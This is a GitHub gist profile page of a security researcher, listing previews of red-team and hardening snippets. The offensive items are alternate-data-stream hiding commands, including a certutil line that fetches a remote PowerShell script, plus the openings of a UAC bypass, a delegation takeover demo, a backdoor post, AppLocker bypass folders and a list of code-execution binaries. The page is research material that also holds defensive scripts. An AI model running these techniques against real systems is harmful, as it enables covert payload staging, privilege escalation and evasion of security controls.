Skip to content

Instantly share code, notes, and snippets.

View api0cradle's full-sized avatar

Oddvar Moe api0cradle

746 followers · 11 following
View GitHub Profile
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active April 21, 2024 17:37
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@api0cradle
api0cradle / check_vulnerabledrivers.ps1
Created May 19, 2023 14:13
A quick script to check for vulnerable drivers. Compares drivers on system with list from loldrivers.io
# Simple script to check drivers in C:\windows\system32\drivers against the loldrivers list
# Author: Oddvar Moe - @oddvar.moe
$drivers = get-childitem -Path c:\windows\system32\drivers
$web_client = new-object system.net.webclient
$loldrivers = $web_client.DownloadString(" https://www.loldrivers.io/api/drivers.json") | ConvertFrom-Json
Write-output("Checking {0} drivers in C:\windows\system32\drivers against loldrivers.io json file" -f $drivers.Count)
foreach ($lol in $loldrivers.KnownVulnerableSamples)
{
@api0cradle
api0cradle / akagi_41.c
Created August 16, 2017 07:14 — forked from hfiref0x/akagi_41.c
UAC bypass using CMSTPLUA COM interface
typedef interface ICMLuaUtil ICMLuaUtil;
typedef struct ICMLuaUtilVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ICMLuaUtil * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
@api0cradle
api0cradle / rbcd_demo.ps1
Created March 12, 2020 14:42 — forked from HarmJ0y/rbcd_demo.ps1
Resource-based constrained delegation computer DACL takeover demo
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
@api0cradle
api0cradle / blog.txt
Created March 27, 2019 10:12
Gist Blog - Inside Out, Simple backdoors
From the inside out, a minimalist backdoor.
I'm a pretty big fan of simple, and elegant. In this gist blog, I'll show you a very simple way to maintain access to a remote system that is behind a FireWall, NAT and VPN.
We will use in this example 3 tools.
1. Node
2. PowerShell
3. LocalTunnel
While I have a full compact, custom version, I will not release this.
@api0cradle
api0cradle / windows_hardening.cmd
Created February 24, 2020 07:29 — forked from mackwage/windows_hardening.cmd
Script to perform some hardening of Windows OS
::
::#######################################################################
::
:: Change file associations to protect against common ransomware attacks
:: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell
:: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :)
:: ---------------------
ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
@api0cradle
api0cradle / AccessChk.bat
Last active September 11, 2023 10:17
AppLocker hardening
accesschk -w -s -u Users "C:\Program Files" >> programfiles.txt
accesschk -w -s -u Everyone "C:\Program Files" >> programfiles.txt
accesschk -w -s -u "Authenticated Users" "C:\Program Files" >> programfiles.txt
accesschk -w -s -u Interactive "C:\Program Files" >> programfiles.txt
accesschk -w -s -u "This Organization" "C:\Program Files" >> programfiles.txt
accesschk -w -s -u "Authentication authority asserted identity" "C:\Program Files" >> programfiles.txt
accesschk -w -s -u "Mandatory Label\Medium Mandatory Level" "C:\Program Files" >> programfiles.txt
accesschk -w -s -u %username% "C:\Program Files" >> programfiles.txt
accesschk -w -s -u Users "C:\Program Files (x86)" >> programfilesx86.txt
@api0cradle
api0cradle / AppLocker-Bypass-Folderperms-CCM.md
Last active September 4, 2023 22:25

c:\Windows\ccm\inventory\noidmifs
c:\Windows\ccm\logs
c:\Windows\ccm\systemtemp\appvtempdata\appvcommandoutput

@api0cradle
api0cradle / 38bd9e647609d121621fc817ab2fdb5b58e9a2ac6c2f6640c36bc2164e7d54f1
Created May 5, 2023 08:09 — forked from JohnLaTwC/38bd9e647609d121621fc817ab2fdb5b58e9a2ac6c2f6640c36bc2164e7d54f1
A very interesting DOCX no?
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
===============================================================================
FILE: 38bd9e647609d121621fc817ab2fdb5b58e9a2ac6c2f6640c36bc2164e7d54f1
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Declare PtrSafe Function ExpandString Lib "kernel32" Alias "ExpandEnvironmentStringsA" (ByVal lpSrc As String, ByVal lpDst As String, ByVal nSize As Long) As Long
@api0cradle
api0cradle / gist:7c774561d50dc50b67e072f49605f235
Created November 3, 2017 07:23 — forked from trustedsec/gist:686057a1b8cdf3e580c57b211b263abe
List of applications for code execution via legit binaries
Rundll32.exe
Regsvr32.exe
Mshta.exe
Msbuild.exe
Cbd.exe
Csc.exe
Tracker.exe
Ntsd.exe
Bginfo.exe
Kd.exe